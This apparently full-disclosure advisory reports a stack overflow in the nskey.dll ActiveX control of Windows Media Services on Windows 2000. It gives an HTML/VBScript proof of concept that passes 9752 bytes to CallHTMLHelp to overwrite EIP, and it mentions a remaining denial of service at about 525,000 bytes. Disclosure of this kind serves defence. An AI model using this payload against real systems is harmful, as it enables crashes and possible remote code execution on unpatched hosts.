Product: Windows Media Services (nskey.dll)
Products affected/tested: Windows 2000 Server
                          Windows 2000 Advanced Server
                          Windows 2000 Datacenter Edition

Attack: Stack Overflow

Technical Details:

Via an activex control that is safe for scripting/initilize, passing atleast 9752 bytes
to CallHTMLHelp will overwrite the EIP and remote code execution may be possible.

PoC exploit:

<html><body>

<object id=target classid=clsid:2646205B-878C-11D1-B07C-0000C040BCDB></object>
<script language=vbscript>

arg1=String(9752, "A")
target.CallHTMLHelp arg1

</script>
</body></html>

This PoC should work fine and overwrite the EIP, hitting 0x41414141 of course. Now for the
part for why I released this information...

Apprently this issue has been very silently fixed (I cannot find ANY information ANYWHERE for or relating to it) by Microsoft a few patches ago.

And.. WINDOWS 2000 IS OLD. Widely used, but still pretty old for a modern operating system.

This bug was pretty exploitable until I used Windows Up2date :(

But, to no surprise, they didn't fix the bug completely. Theres still a DoS after putting
about 525,000 bytes in the buffer. Oh well :)

Jeremy Brown (0xjbrown41@gmail.com)